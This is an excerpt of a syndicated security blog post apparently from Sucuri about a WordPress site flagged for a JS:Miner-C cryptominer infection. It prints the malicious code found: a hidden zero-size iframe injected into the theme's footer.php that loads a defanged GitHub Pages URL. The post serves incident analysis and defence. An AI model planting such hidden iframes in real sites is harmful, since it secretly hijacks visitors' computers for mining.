Recently, a webmaster contacted us when his AVG antivirus reported that the JS:Miner-C [Trj] infection was found on their site.
Our investigation revealed a hidden iframe had been injected into the theme’s footer.php file:
<iframe src=”hxxps://wpupdates.github[.]io/ping/” style=”width:0;heigh:0;border:none;”></iframe>
When we opened the URL in a browser, the page was blank.
*** This is a Security Bloggers Network syndicated blog from Sucuri Blog authored by Denis Sinegubko. Read the original post at: https://blog.sucuri.net/2017/12/malicious-cryptominers-from-github.html